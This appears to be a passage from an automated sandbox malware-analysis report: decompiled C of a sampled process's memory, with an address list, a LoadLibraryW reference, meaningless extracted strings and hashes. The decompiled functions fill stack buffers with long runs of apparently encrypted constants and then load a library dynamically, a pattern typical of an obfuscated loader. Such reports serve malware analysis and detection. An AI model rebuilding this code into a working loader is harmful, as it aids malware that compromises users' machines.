				 *((intOrPtr*)(_t468 - 0x15c)) = 0xdd778571;
				 *((intOrPtr*)(_t468 - 0x158)) = 0x7a3d44;
				 *((intOrPtr*)(_t468 - 0x154)) = 0xa1065c51;
				 *((intOrPtr*)(_t468 - 0x150)) = 0x795d5612;
				 *((intOrPtr*)(_t468 - 0x14c)) = 0x6f07b478;
				 *((intOrPtr*)(_t468 - 0x148)) = 0xf0d83130;
				 *((intOrPtr*)(_t468 - 0x144)) = 0x5c1ef69b;
				 *((intOrPtr*)(_t468 - 0x140)) = 0x781debe1;
				 *((intOrPtr*)(_t468 - 0x13c)) = 0x1120ee63;
				 *((intOrPtr*)(_t468 - 0x138)) = 0x2b8503cf;
				 *((intOrPtr*)(_t468 - 0x134)) = 0x943a999d;
				 *((intOrPtr*)(_t468 - 0x130)) = 0xb865506d;
				 *((intOrPtr*)(_t468 - 0x12c)) = 0x26c9d34b;
				 *((intOrPtr*)(_t468 - 0x128)) = 0x115eba9f;
				 *((intOrPtr*)(_t468 - 0x124)) = 0x99b5f304;
				 *((intOrPtr*)(_t468 - 0x120)) = 0xd6e48a9d;
				 *((intOrPtr*)(_t468 - 0x11c)) = 0x59bcd149;
				 *((intOrPtr*)(_t468 - 0x118)) = 0x4c431318;
				 *((intOrPtr*)(_t468 - 0x114)) = 0x8978351d;
				 *((intOrPtr*)(_t468 - 0x110)) = 0xc3ffc4b1;
				 *((intOrPtr*)(_t468 - 0x10c)) = 0xbb5b1fb9;
				 *((intOrPtr*)(_t468 - 0x108)) = 0x2f6be137;
				 *((intOrPtr*)(_t468 - 0x104)) = 0x262d0fbe;
				 *((intOrPtr*)(_t468 - 0x100)) = 0x75fed873;
				 *((intOrPtr*)(_t468 - 0xfc)) = 0x44afd977;
				 *((intOrPtr*)(_t468 - 0xf8)) = 0xf2cea9c6;
				 *((intOrPtr*)(_t468 - 0xf4)) = 0xf84ba91;
				 *((intOrPtr*)(_t468 - 0xf0)) = 0xfa0c6fe4;
				 *((intOrPtr*)(_t468 - 0xec)) = 0xdb134d4b;
				 *((intOrPtr*)(_t468 - 0xe8)) = 0xb0e8b9e2;
				 *((intOrPtr*)(_t468 - 0xe4)) = 0xc34e98b5;
				 *((intOrPtr*)(_t468 - 0xe0)) = 0x1e427a7a;
				 *((intOrPtr*)(_t468 - 0xdc)) = 0x64e09aaa;
				 *((intOrPtr*)(_t468 - 0xd8)) = 0x6e11730c;
				 *((intOrPtr*)(_t468 - 0xd4)) = 0x334b37e2;
				 *((intOrPtr*)(_t468 - 0xd0)) = 0x8255cbc;
				 *((intOrPtr*)(_t468 - 0xcc)) = 0x229df4d5;
				 *((intOrPtr*)(_t468 - 0xc8)) = 0x796c7289;
				 *((intOrPtr*)(_t468 - 0xc4)) = 0xe61cd3fb;
				_push(0x10f9141c);
				 *((intOrPtr*)(_t468 - 0xc0)) = 0xa05ea45a;
				 *((intOrPtr*)(_t468 - 0xbc)) = 0x38cff067;
				 *((intOrPtr*)(_t468 - 0xb8)) = 0x9aa255b2;
				 *((intOrPtr*)(_t468 - 0xb4)) = 0xeb0e52a6;
				 *((intOrPtr*)(_t468 - 0xb0)) = 0x71bf23a2;
				 *((intOrPtr*)(_t468 - 0xac)) = 0x612156bc;
				 *((intOrPtr*)(_t468 - 0xa8)) = 0x7d673cb7;
				 *((intOrPtr*)(_t468 - 0xa4)) = 0x7c13fcf8;
				 *((intOrPtr*)(_t468 - 0xa0)) = 0xa0e09eac;
				 *((intOrPtr*)(_t468 - 0x9c)) = 0xab731cd2;
				 *((intOrPtr*)(_t468 - 0x98)) = 0x8736b4f0;
				 *((intOrPtr*)(_t468 - 0x94)) = 0x1d587615;
				 *((intOrPtr*)(_t468 - 0x90)) = 0x48d0c4e1;
				 *((intOrPtr*)(_t468 - 0x8c)) = 0xcd6ef056;
				 *((intOrPtr*)(_t468 - 0x88)) = 0x40746a29;
				 *((intOrPtr*)(_t468 - 0x84)) = 0xb899ade9;
				 *((intOrPtr*)(_t468 - 0x80)) = 0xf8e96291;
				 *((intOrPtr*)(_t468 - 0x7c)) = 0xcd369cbd;
				 *((intOrPtr*)(_t468 - 0x78)) = 0xd578837e;
				 *((intOrPtr*)(_t468 - 0x74)) = 0x7bfad1c8;
				 *((intOrPtr*)(_t468 - 0x70)) = 0x2a892418;
				 *((intOrPtr*)(_t468 - 0x6c)) = 0x787daf4f;
				 *((intOrPtr*)(_t468 - 0x68)) = 0x63ab001f;
				 *((intOrPtr*)(_t468 - 0x64)) = 0x56953a11;
				 *((intOrPtr*)(_t468 - 0x60)) = 0xb152f6fe;
				 *((intOrPtr*)(_t468 - 0x5c)) = 0x32d5519c;
				 *((intOrPtr*)(_t468 - 0x58)) = 0xa3557b9d;
				 *((intOrPtr*)(_t468 - 0x54)) = 0x3e1e42a3;
				 *((intOrPtr*)(_t468 - 0x50)) = 0xd4f589b5;
				 *((intOrPtr*)(_t468 - 0x4c)) = 0xf487afca;
				 *((intOrPtr*)(_t468 - 0x48)) = 0x5232a7ec;
				 *((intOrPtr*)(_t468 - 0x44)) = 0xa7af87bc;
				 *((intOrPtr*)(_t468 - 0x40)) = 0xfaecb4e9;
				 *((intOrPtr*)(_t468 - 0x3c)) = 0x3ce6583a;
				 *((intOrPtr*)(_t468 - 0x38)) = 0x54c9160f;
				 *((intOrPtr*)(_t468 - 0x34)) = 0x7a2e6385;
				 *((intOrPtr*)(_t468 - 0x30)) = 0x52f8d07a;
				 *((intOrPtr*)(_t468 - 0x2c)) = 0x203b1ea1;
				 *((intOrPtr*)(_t468 - 0x28)) = 0x2d3d57d3;
				 *((intOrPtr*)(_t468 - 0x24)) = 0xfad6afe;
				 *((intOrPtr*)(_t468 - 0x20)) = 0xee3f4cb7;
				 *((intOrPtr*)(_t468 - 0x1c)) = 0xf1d7db08;
				 *((intOrPtr*)(_t468 - 0x18)) = 0x6820cb60;
				 *((intOrPtr*)(_t468 - 0x14)) = 0xd984d399;
				 *((intOrPtr*)(_t468 - 0x10)) = 0x8f097128;
				 *((intOrPtr*)(_t468 - 0xc)) = 0x977bfb06;
				 *((intOrPtr*)(_t468 - 8)) = 0xb12e09a4;
				 *((intOrPtr*)(_t468 - 4)) = 0xa9208ddd;
				_t466 = L02D61D10(0x2d73340, 0x2c, __edi, __esi);
				 *0x2d771f0 = LoadLibraryW(_t454);
				L02D61DB0(_t466);
				return E02D61570(_t458,  *0x2d771f0, _t468 - 0x710, _t466, 0x1c4, 0x75bf0e7d, 0x2d763a0);
			}

0x02d6a78a
0x02d6a78a
0x02d6a794
0x02d6a79e
0x02d6a7a8
0x02d6a7b2
0x02d6a7bc
0x02d6a7c6
0x02d6a7d0
0x02d6a7da
0x02d6a7e4
0x02d6a7ee
0x02d6a7f8
0x02d6a802
0x02d6a80c
0x02d6a816
0x02d6a820
0x02d6a82a
0x02d6a834
0x02d6a83e
0x02d6a848
0x02d6a852
0x02d6a85c
0x02d6a866
0x02d6a870
0x02d6a87a
0x02d6a884
0x02d6a88e
0x02d6a898
0x02d6a8a2
0x02d6a8ac
0x02d6a8b6
0x02d6a8c0
0x02d6a8ca
0x02d6a8d4
0x02d6a8de
0x02d6a8e8
0x02d6a8f2
0x02d6a8fc
0x02d6a906
0x02d6a910
0x02d6a91a
0x02d6a924
0x02d6a92e
0x02d6a938
0x02d6a942
0x02d6a94c
0x02d6a956
0x02d6a960
0x02d6a96a
0x02d6a974
0x02d6a97e
0x02d6a988
0x02d6a992
0x02d6a99c
0x02d6a9a6
0x02d6a9b0
0x02d6a9ba
0x02d6a9c4
0x02d6a9ce
0x02d6a9d8
0x02d6a9e2
0x02d6a9ec
0x02d6a9f6
0x02d6aa00
0x02d6aa0a
0x02d6aa14
0x02d6aa1e
0x02d6aa28
0x02d6aa32
0x02d6aa3c
0x02d6aa46
0x02d6aa50
0x02d6aa5a
0x02d6aa64
0x02d6aa6e
0x02d6aa78
0x02d6aa82
0x02d6aa8c
0x02d6aa96
0x02d6aaa0
0x02d6aaaa
0x02d6aab4
0x02d6aabe
0x02d6aac8
0x02d6aad2
0x02d6aadc
0x02d6aae6
0x02d6aaf0
0x02d6aafa
0x02d6ab04
0x02d6ab0e
0x02d6ab18
0x02d6ab22
0x02d6ab2c
0x02d6ab36
0x02d6ab40
0x02d6ab4a
0x02d6ab54
0x02d6ab5e
0x02d6ab68
0x02d6ab72
0x02d6ab7c
0x02d6ab86
0x02d6ab90
0x02d6ab9a
0x02d6aba4
0x02d6abae
0x02d6abb8
0x02d6abc2
0x02d6abcc
0x02d6abd6
0x02d6abe0
0x02d6abea
0x02d6abf4
0x02d6abfe
0x02d6ac08
0x02d6ac12
0x02d6ac1c
0x02d6ac26
0x02d6ac30
0x02d6ac3a
0x02d6ac44
0x02d6ac4e
0x02d6ac58
0x02d6ac62
0x02d6ac6c
0x02d6ac76
0x02d6ac80
0x02d6ac8a
0x02d6ac94
0x02d6ac9e
0x02d6aca8
0x02d6acb2
0x02d6acbc
0x02d6acc6
0x02d6acd0
0x02d6acda
0x02d6ace4
0x02d6acee
0x02d6acf8
0x02d6ad02
0x02d6ad0c
0x02d6ad16
0x02d6ad20
0x02d6ad2a
0x02d6ad34
0x02d6ad3e
0x02d6ad48
0x02d6ad52
0x02d6ad5c
0x02d6ad66
0x02d6ad70
0x02d6ad7a
0x02d6ad84
0x02d6ad8e
0x02d6ad98
0x02d6ada2
0x02d6adac
0x02d6adb6
0x02d6adc0
0x02d6adca
0x02d6add4
0x02d6adde
0x02d6ade8
0x02d6adf2
0x02d6adfc
0x02d6ae06
0x02d6ae10
0x02d6ae1a
0x02d6ae24
0x02d6ae2e
0x02d6ae38
0x02d6ae42
0x02d6ae4c
0x02d6ae56
0x02d6ae60
0x02d6ae6a
0x02d6ae74
0x02d6ae7e
0x02d6ae88
0x02d6ae92
0x02d6ae9c
0x02d6aea6
0x02d6aeb0
0x02d6aeba
0x02d6aec4
0x02d6aece
0x02d6aed8
0x02d6aee2
0x02d6aeec
0x02d6aef6
0x02d6af00
0x02d6af0a
0x02d6af14
0x02d6af1e
0x02d6af28
0x02d6af32
0x02d6af3c
0x02d6af46
0x02d6af50
0x02d6af5a
0x02d6af64
0x02d6af6e
0x02d6af78
0x02d6af82
0x02d6af8c
0x02d6af96
0x02d6afa0
0x02d6afaa
0x02d6afb4
0x02d6afbe
0x02d6afc8
0x02d6afd2
0x02d6afdc
0x02d6afe6
0x02d6aff0
0x02d6affa
0x02d6b004
0x02d6b00e
0x02d6b018
0x02d6b022
0x02d6b02c
0x02d6b036
0x02d6b040
0x02d6b04a
0x02d6b054
0x02d6b05e
0x02d6b068
0x02d6b072
0x02d6b07c
0x02d6b086
0x02d6b090
0x02d6b09a
0x02d6b0a4
0x02d6b0ae
0x02d6b0b8
0x02d6b0c2
0x02d6b0cc
0x02d6b0d6
0x02d6b0e0
0x02d6b0ea
0x02d6b0f4
0x02d6b0fe
0x02d6b108
0x02d6b112
0x02d6b11c
0x02d6b126
0x02d6b130
0x02d6b13a
0x02d6b144
0x02d6b14e
0x02d6b158
0x02d6b162
0x02d6b16c
0x02d6b176
0x02d6b180
0x02d6b18a
0x02d6b194
0x02d6b19e
0x02d6b1a8
0x02d6b1b2
0x02d6b1bc
0x02d6b1c6
0x02d6b1d0
0x02d6b1da
0x02d6b1e4
0x02d6b1ee
0x02d6b1f8
0x02d6b202
0x02d6b20c
0x02d6b216
0x02d6b220
0x02d6b22a
0x02d6b234
0x02d6b23e
0x02d6b248
0x02d6b252
0x02d6b25c
0x02d6b266
0x02d6b270
0x02d6b27a
0x02d6b284
0x02d6b28e
0x02d6b298
0x02d6b2a2
0x02d6b2ac
0x02d6b2b6
0x02d6b2c0
0x02d6b2ca
0x02d6b2d4
0x02d6b2de
0x02d6b2e8
0x02d6b2f2
0x02d6b2fc
0x02d6b306
0x02d6b310
0x02d6b31a
0x02d6b324
0x02d6b32e
0x02d6b338
0x02d6b342
0x02d6b34c
0x02d6b356
0x02d6b360
0x02d6b36a
0x02d6b374
0x02d6b37e
0x02d6b388
0x02d6b392
0x02d6b39c
0x02d6b3a6
0x02d6b3b0
0x02d6b3ba
0x02d6b3c4
0x02d6b3ce
0x02d6b3d8
0x02d6b3e2
0x02d6b3ec
0x02d6b3f6
0x02d6b400
0x02d6b40a
0x02d6b414
0x02d6b41e
0x02d6b428
0x02d6b432
0x02d6b43c
0x02d6b446
0x02d6b450
0x02d6b45a
0x02d6b464
0x02d6b46e
0x02d6b478
0x02d6b482
0x02d6b48c
0x02d6b496
0x02d6b4a0
0x02d6b4aa
0x02d6b4b4
0x02d6b4be
0x02d6b4c8
0x02d6b4d2
0x02d6b4dc
0x02d6b4e6
0x02d6b4f0
0x02d6b4fa
0x02d6b504
0x02d6b50e
0x02d6b518
0x02d6b522
0x02d6b52c
0x02d6b536
0x02d6b540
0x02d6b54a
0x02d6b554
0x02d6b55e
0x02d6b568
0x02d6b572
0x02d6b57c
0x02d6b586
0x02d6b590
0x02d6b59a
0x02d6b5a4
0x02d6b5ae
0x02d6b5b8
0x02d6b5c2
0x02d6b5cc
0x02d6b5d6
0x02d6b5e0
0x02d6b5ea
0x02d6b5f4
0x02d6b5fe
0x02d6b608
0x02d6b612
0x02d6b61c
0x02d6b626
0x02d6b630
0x02d6b63a
0x02d6b644
0x02d6b64e
0x02d6b658
0x02d6b662
0x02d6b66c
0x02d6b676
0x02d6b680
0x02d6b68a
0x02d6b694
0x02d6b69e
0x02d6b6a8
0x02d6b6b2
0x02d6b6bc
0x02d6b6c6
0x02d6b6d0
0x02d6b6da
0x02d6b6e4
0x02d6b6ee
0x02d6b6f8
0x02d6b702
0x02d6b70c
0x02d6b716
0x02d6b720
0x02d6b72a
0x02d6b734
0x02d6b73e
0x02d6b748
0x02d6b752
0x02d6b75c
0x02d6b76b
0x02d6b775
0x02d6b77f
0x02d6b789
0x02d6b793
0x02d6b79d
0x02d6b7a7
0x02d6b7b1
0x02d6b7bb
0x02d6b7c5
0x02d6b7cf
0x02d6b7d9
0x02d6b7e3
0x02d6b7ed
0x02d6b7f7
0x02d6b801
0x02d6b808
0x02d6b80f
0x02d6b816
0x02d6b81d
0x02d6b824
0x02d6b82b
0x02d6b832
0x02d6b839
0x02d6b840
0x02d6b847
0x02d6b84e
0x02d6b855
0x02d6b85c
0x02d6b863
0x02d6b86a
0x02d6b871
0x02d6b878
0x02d6b87f
0x02d6b886
0x02d6b88d
0x02d6b894
0x02d6b89b
0x02d6b8a2
0x02d6b8a9
0x02d6b8b0
0x02d6b8b7
0x02d6b8be
0x02d6b8c5
0x02d6b8cc
0x02d6b8d3
0x02d6b8da
0x02d6b8e9
0x02d6b8f4
0x02d6b8f9
0x02d6b925

APIs

LoadLibraryW.KERNEL32(00000000), ref: 02D6B8EC

Strings

H D%, xrefs: 02D6B55E
:X<, xrefs: 02D6B878
7K3, xrefs: 02D6B720
^a, xrefs: 02D6AE7E
RN5`, xrefs: 02D6AB90
7k/, xrefs: 02D6B69E
' #C, xrefs: 02D6AE38
S1p, xrefs: 02D6AA96
.ZI, xrefs: 02D6AC4E
D=z, xrefs: 02D6B5D6
\1>, xrefs: 02D6A7A8
eJn}, xrefs: 02D6B568
B"* , xrefs: 02D6B374
ML-', xrefs: 02D6B4B4
/g=, xrefs: 02D6A9BA
7, xrefs: 02D6B388
WfP=, xrefs: 02D6AF3C
)jt@, xrefs: 02D6B7ED
=z4, xrefs: 02D6B45A
/Z7~, xrefs: 02D6ACEE
%h(, xrefs: 02D6B068

Memory Dump Source

Source File: 00000005.00000002.668324043.0000000002D61000.00000020.00000001.sdmp, Offset: 02D60000, based on PE: true

Associated: 00000005.00000002.668317677.0000000002D60000.00000004.00000001.sdmp Download File
Associated: 00000005.00000002.668336748.0000000002D71000.00000002.00000001.sdmp Download File
Associated: 00000005.00000002.668346733.0000000002D72000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_2d60000_aspcolorer.jbxd

Yara matches

Similarity

API ID: LibraryLoad
String ID: .ZI$\1>$' #C$)jt@$/Z7~$7$7k/$:X<$=z4$B"* $D=z$H D%$ML-'$RN5`$S1p$WfP=$eJn}$%h($/g=$7K3$^a
API String ID: 1029625771-1014736697
Opcode ID: b09f42e3be7d565943f90791059b2d85b7eea63097187de5a56710ff253ad1ec
Instruction ID: f1404b47c79ba2561774619e90d5616f457687d477e6640f0b3b8dd44145a7f0
Opcode Fuzzy Hash: b09f42e3be7d565943f90791059b2d85b7eea63097187de5a56710ff253ad1ec
Instruction Fuzzy Hash: 3482A6F48567698BEB719F429E8578DBB31BB51304F6086C8C19D3B214CB720B92CF89

Uniqueness

Uniqueness Score: -1.00%

Function 02D672DA, Relevance: 28.3, APIs: 1, Strings: 15, Instructions: 266
libraryCOMMON

Download Yara Rule

C-Code - Quality: 99%

			E02D672DA(void* __ebx, void* __edi, void* __esi, void* __eflags) {
				void* _t250;
				void* _t260;

				_t250 = __ebx;
				 *((intOrPtr*)(_t260 - 0x3d0)) = 0xce2afbd9;
				 *((intOrPtr*)(_t260 - 0x3cc)) = 0x84a72d7a;
				 *((intOrPtr*)(_t260 - 0x3c8)) = 0x432bcb70;
				 *((intOrPtr*)(_t260 - 0x3c4)) = 0xba5a060d;
				 *((intOrPtr*)(_t260 - 0x3c0)) = 0x63556d90;
				 *((intOrPtr*)(_t260 - 0x3bc)) = 0x2c964d49;
				 *((intOrPtr*)(_t260 - 0x3b8)) = 0xec0fa018;
				 *((intOrPtr*)(_t260 - 0x3b4)) = 0x445262cd;
				 *((intOrPtr*)(_t260 - 0x3b0)) = 0x554157b0;
				 *((intOrPtr*)(_t260 - 0x3ac)) = 0xd89c0ee8;
				 *((intOrPtr*)(_t260 - 0x3a8)) = 0xc3821b23;
				 *((intOrPtr*)(_t260 - 0x3a4)) = 0x465f1a6d;
				 *((intOrPtr*)(_t260 - 0x3a0)) = 0xf5731f1a;
				 *((intOrPtr*)(_t260 - 0x39c)) = 0x97f4e754;
				 *((intOrPtr*)(_t260 - 0x398)) = 0x2fca7433;
				 *((intOrPtr*)(_t260 - 0x394)) = 0x3c49f32d;
				 *((intOrPtr*)(_t260 - 0x390)) = 0x5413e009;
				 *((intOrPtr*)(_t260 - 0x38c)) = 0x1e4824e7;
				 *((intOrPtr*)(_t260 - 0x388)) = 0x7e1394e1;
				 *((intOrPtr*)(_t260 - 0x384)) = 0x5464ebc2;
				 *((intOrPtr*)(_t260 - 0x380)) = 0x7f89ac54;
				 *((intOrPtr*)(_t260 - 0x37c)) = 0xd1926648;
				 *((intOrPtr*)(_t260 - 0x378)) = 0x60a8fd5f;
				 *((intOrPtr*)(_t260 - 0x374)) = 0x2c95feee;
				 *((intOrPtr*)(_t260 - 0x370)) = 0x9ee32203;
				 *((intOrPtr*)(_t260 - 0x36c)) = 0xf9fc329d;
				 *((intOrPtr*)(_t260 - 0x368)) = 0x2d748158;
				 *((intOrPtr*)(_t260 - 0x364)) = 0xbc44b53a;
				 *((intOrPtr*)(_t260 - 0x360)) = 0x77946b69;
				 *((intOrPtr*)(_t260 - 0x35c)) = 0x1b041b06;
				 *((intOrPtr*)(_t260 - 0x358)) = 0xe747cc98;
				 *((intOrPtr*)(_t260 - 0x354)) = 0xfe62811f;
				 *((intOrPtr*)(_t260 - 0x350)) = 0x36a45c02;
				 *((intOrPtr*)(_t260 - 0x34c)) = 0x2017824b;
				 *((intOrPtr*)(_t260 - 0x348)) = 0xcfd8cb2b;
				 *((intOrPtr*)(_t260 - 0x344)) = 0xe4c206bc;
				 *((intOrPtr*)(_t260 - 0x340)) = 0x90982c40;
				 *((intOrPtr*)(_t260 - 0x33c)) = 0x7e2f27e8;
				 *((intOrPtr*)(_t260 - 0x338)) = 0x5177d32d;
				 *((intOrPtr*)(_t260 - 0x334)) = 0x28ad99a7;
				 *((intOrPtr*)(_t260 - 0x330)) = 0xba4a8702;
				 *((intOrPtr*)(_t260 - 0x32c)) = 0x870442ee;
				 *((intOrPtr*)(_t260 - 0x328)) = 0x104afbf4;
				 *((intOrPtr*)(_t260 - 0x324)) = 0x62c3eec9;
				 *((intOrPtr*)(_t260 - 0x320)) = 0xada67e85;
				 *((intOrPtr*)(_t260 - 0x31c)) = 0xde34cf27;
				 *((intOrPtr*)(_t260 - 0x318)) = 0x3f10c50a;
				 *((intOrPtr*)(_t260 - 0x314)) = 0x11cec365;
				 *((intOrPtr*)(_t260 - 0x310)) = 0xe88be46e;
				 *((intOrPtr*)(_t260 - 0x30c)) = 0xfed5e034;
				 *((intOrPtr*)(_t260 - 0x308)) = 0x60959615;
				 *((intOrPtr*)(_t260 - 0x304)) = 0x643ef1a5;
				 *((intOrPtr*)(_t260 - 0x300)) = 0x550af26b;
				 *((intOrPtr*)(_t260 - 0x2fc)) = 0xc46bcb76;
				 *((intOrPtr*)(_t260 - 0x2f8)) = 0xcf0b9a40;
				 *((intOrPtr*)(_t260 - 0x2f4)) = 0xcad98d99;
				 *((intOrPtr*)(_t260 - 0x2f0)) = 0x6627d858;
				 *((intOrPtr*)(_t260 - 0x2ec)) = 0x9cac3ea0;
				 *((intOrPtr*)(_t260 - 0x2e8)) = 0x719155d6;
				 *((intOrPtr*)(_t260 - 0x2e4)) = 0x969a33e;
				 *((intOrPtr*)(_t260 - 0x2e0)) = 0xc988bee6;
				 *((intOrPtr*)(_t260 - 0x2dc)) = 0x53b9cd6;
				 *((intOrPtr*)(_t260 - 0x2d8)) = 0x43dc0666;
				 *((intOrPtr*)(_t260 - 0x2d4)) = 0xe36a7597;
				 *((intOrPtr*)(_t260 - 0x2d0)) = 0x7bfcb06e;
				 *((intOrPtr*)(_t260 - 0x2cc)) = 0x62c054df;
				 *((intOrPtr*)(_t260 - 0x2c8)) = 0xa78494a;
				 *((intOrPtr*)(_t260 - 0x2c4)) = 0xb33cf4dc;
				 *((intOrPtr*)(_t260 - 0x2c0)) = 0x897c764c;
				 *((intOrPtr*)(_t260 - 0x2bc)) = 0xb83435ae;
				 *((intOrPtr*)(_t260 - 0x2b8)) = 0xf718065c;
				 *((intOrPtr*)(_t260 - 0x2b4)) = 0xbe3b2098;
				 *((intOrPtr*)(_t260 - 0x2b0)) = 0xd906dec0;
				 *((intOrPtr*)(_t260 - 0x2ac)) = 0x251dd978;
				 *((intOrPtr*)(_t260 - 0x2a8)) = 0x7f535b3f;
				 *((intOrPtr*)(_t260 - 0x2a4)) = 0x856f95bc;
				 *((intOrPtr*)(_t260 - 0x2a0)) = 0x6d236b77;
				 *((intOrPtr*)(_t260 - 0x29c)) = 0x360f734a;
				 *((intOrPtr*)(_t260 - 0x298)) = 0x21acc3a3;
				 *((intOrPtr*)(_t260 - 0x294)) = 0x9c64e473;
				 *((intOrPtr*)(_t260 - 0x290)) = 0x16e54a7c;
				 *((intOrPtr*)(_t260 - 0x28c)) = 0xf3c1351b;
				 *((intOrPtr*)(_t260 - 0x288)) = 0x9f05b4bb;
				 *((intOrPtr*)(_t260 - 0x284)) = 0x695723a0;
				 *((intOrPtr*)(_t260 - 0x280)) = 0xf5911e67;
				 *((intOrPtr*)(_t260 - 0x27c)) = 0x967afa59;
				 *((intOrPtr*)(_t260 - 0x278)) = 0xa3f98fc0;
				 *((intOrPtr*)(_t260 - 0x274)) = 0x27ff086c;
				 *((intOrPtr*)(_t260 - 0x270)) = 0x9055bc0b;
				 *((intOrPtr*)(_t260 - 0x26c)) = 0xc9cc24b2;
				 *((intOrPtr*)(_t260 - 0x268)) = 0x45038e55;
				 *((intOrPtr*)(_t260 - 0x264)) = 0x84ed81d1;
				 *((intOrPtr*)(_t260 - 0x260)) = 0xe3b98093;
				 *((intOrPtr*)(_t260 - 0x25c)) = 0xae2c8429;
				 *((intOrPtr*)(_t260 - 0x258)) = 0xa2d3ced5;
				 *((intOrPtr*)(_t260 - 0x254)) = 0x9b3c56b6;
				 *((intOrPtr*)(_t260 - 0x250)) = 0x5d5a6374;
				 *((intOrPtr*)(_t260 - 0x24c)) = 0xc52b3542;
				 *((intOrPtr*)(_t260 - 0x248)) = 0x52ed06cf;
				 *((intOrPtr*)(_t260 - 0x244)) = 0x585568b3;
				 *((intOrPtr*)(_t260 - 0x240)) = 0x41a0ebd9;
				 *((intOrPtr*)(_t260 - 0x23c)) = 0x97c50e30;
				 *((intOrPtr*)(_t260 - 0x238)) = 0xed2b0824;
				 *((intOrPtr*)(_t260 - 0x234)) = 0x196e4813;
				 *((intOrPtr*)(_t260 - 0x230)) = 0x30ecbd56;
				 *((intOrPtr*)(_t260 - 0x22c)) = 0x6ef21dcf;
				 *((intOrPtr*)(_t260 - 0x228)) = 0x4733d23e;
				 *((intOrPtr*)(_t260 - 0x224)) = 0xd0edffac;
				 *((intOrPtr*)(_t260 - 0x220)) = 0x5c9c8ee8;
				 *((intOrPtr*)(_t260 - 0x21c)) = 0xf3b6dc77;
				 *((intOrPtr*)(_t260 - 0x218)) = 0x1b3fc9a6;
				 *((intOrPtr*)(_t260 - 0x214)) = 0x2c66f35b;
				 *((intOrPtr*)(_t260 - 0x210)) = 0x30f0cdcc;
				 *((intOrPtr*)(_t260 - 0x20c)) = 0x48fb4774;
				 *((intOrPtr*)(_t260 - 0x208)) = 0x11e586db;
				 *((intOrPtr*)(_t260 - 0x204)) = 0xce47fbe2;
				 *((intOrPtr*)(_t260 - 0x200)) = 0x20d1386d;
				 *((intOrPtr*)(_t260 - 0x1fc)) = 0x49198781;
				 *((intOrPtr*)(_t260 - 0x1f8)) = 0x6b83a25c;
				 *((intOrPtr*)(_t260 - 0x1f4)) = 0x57458aa6;
				 *((intOrPtr*)(_t260 - 0x1f0)) = 0x620e8221;
				 *((intOrPtr*)(_t260 - 0x1ec)) = 0x7f8eb057;
				 *((intOrPtr*)(_t260 - 0x1e8)) = 0x14d63aba;
				 *((intOrPtr*)(_t260 - 0x1e4)) = 0xbbc79d11;
				 *((intOrPtr*)(_t260 - 0x1e0)) = 0x4cfeb75;
				 *((intOrPtr*)(_t260 - 0x1dc)) = 0x3b640aef;
				 *((intOrPtr*)(_t260 - 0x1d8)) = 0x644e9699;
				 *((intOrPtr*)(_t260 - 0x1d4)) = 0x7298eaff;
				 *((intOrPtr*)(_t260 - 0x1d0)) = 0x928161fe;
				 *((intOrPtr*)(_t260 - 0x1cc)) = 0xc312c3c;
				 *((intOrPtr*)(_t260 - 0x1c8)) = 0xc1662dd8;
				 *((intOrPtr*)(_t260 - 0x1c4)) = 0xfdee131b;
				 *((intOrPtr*)(_t260 - 0x1c0)) = 0x38fffc1f;
				 *((intOrPtr*)(_t260 - 0x1bc)) = 0xc16b3a8;
				 *((intOrPtr*)(_t260 - 0x1b8)) = 0xbb5ffc8e;
				 *((intOrPtr*)(_t260 - 0x1b4)) = 0x5c3b4939;
				 *((intOrPtr*)(_t260 - 0x1b0)) = 0xb1fc49db;
				 *((intOrPtr*)(_t260 - 0x1ac)) = 0x402f0bd1;
				 *((intOrPtr*)(_t260 - 0x1a8)) = 0xfcb5dc7d;
				 *((intOrPtr*)(_t260 - 0x1a4)) = 0x5ca247b2;
				 *((intOrPtr*)(_t260 - 0x1a0)) = 0x73fe52be;
				 *((intOrPtr*)(_t260 - 0x19c)) = 0x7a9e3e02;
				 *((intOrPtr*)(_t260 - 0x198)) = 0xa566bbe0;
				 *((intOrPtr*)(_t260 - 0x194)) = 0xffcdd0c0;
				 *((intOrPtr*)(_t260 - 0x190)) = 0xcbaa9251;
				 *((intOrPtr*)(_t260 - 0x18c)) = 0xf9b99e57;
				 *((intOrPtr*)(_t260 - 0x188)) = 0xd6378a61;
				 *((intOrPtr*)(_t260 - 0x184)) = 0x876785cd;
				 *((intOrPtr*)(_t260 - 0x180)) = 0x80bd6360;
				 *((intOrPtr*)(_t260 - 0x17c)) = 0xd058e866;
				 *((intOrPtr*)(_t260 - 0x178)) = 0x1c09175;
				 *((intOrPtr*)(_t260 - 0x174)) = 0xd06cbc7f;
				 *((intOrPtr*)(_t260 - 0x170)) = 0xfa46634c;
				 *((intOrPtr*)(_t260 - 0x16c)) = 0xab9f3310;
				 *((intOrPtr*)(_t260 - 0x168)) = 0x3320504c;
				 *((intOrPtr*)(_t260 - 0x164)) = 0x39bd3a35;
				 *((intOrPtr*)(_t260 - 0x160)) = 0xcf0431e8;
				 *((intOrPtr*)(_t260 - 0x15c)) = 0x44e75687;
				 *((intOrPtr*)(_t260 - 0x158)) = 0x5d02babc;
				 *((intOrPtr*)(_t260 - 0x154)) = 0x36e4c841;
				 *((intOrPtr*)(_t260 - 0x150)) = 0x1a717f34;
				 *((intOrPtr*)(_t260 - 0x14c)) = 0x76233ba6;
				 *((intOrPtr*)(_t260 - 0x148)) = 0x641e037b;
				 *((intOrPtr*)(_t260 - 0x144)) = 0xdc60e25f;
				 *((intOrPtr*)(_t260 - 0x140)) = 0xd166dc17;
				 *((intOrPtr*)(_t260 - 0x13c)) = 0x3e0d6f7e;
				 *((intOrPtr*)(_t260 - 0x138)) = 0xbf23c374;
				 *((intOrPtr*)(_t260 - 0x134)) = 0x7f0fd1e2;
				 *((intOrPtr*)(_t260 - 0x130)) = 0xcae8e8de;
				 *((intOrPtr*)(_t260 - 0x12c)) = 0x113529f7;
				 *((intOrPtr*)(_t260 - 0x128)) = 0xb593323b;
				 *((intOrPtr*)(_t260 - 0x124)) = 0x74f24c4a;
				 *((intOrPtr*)(_t260 - 0x120)) = 0xabfbda06;
				 *((intOrPtr*)(_t260 - 0x11c)) = 0x9d7cc562;
				 *((intOrPtr*)(_t260 - 0x118)) = 0x7682291a;
				 *((intOrPtr*)(_t260 - 0x114)) = 0x3efc836d;
				 *((intOrPtr*)(_t260 - 0x110)) = 0xeff202b5;
				 *((intOrPtr*)(_t260 - 0x10c)) = 0xa024d2de;
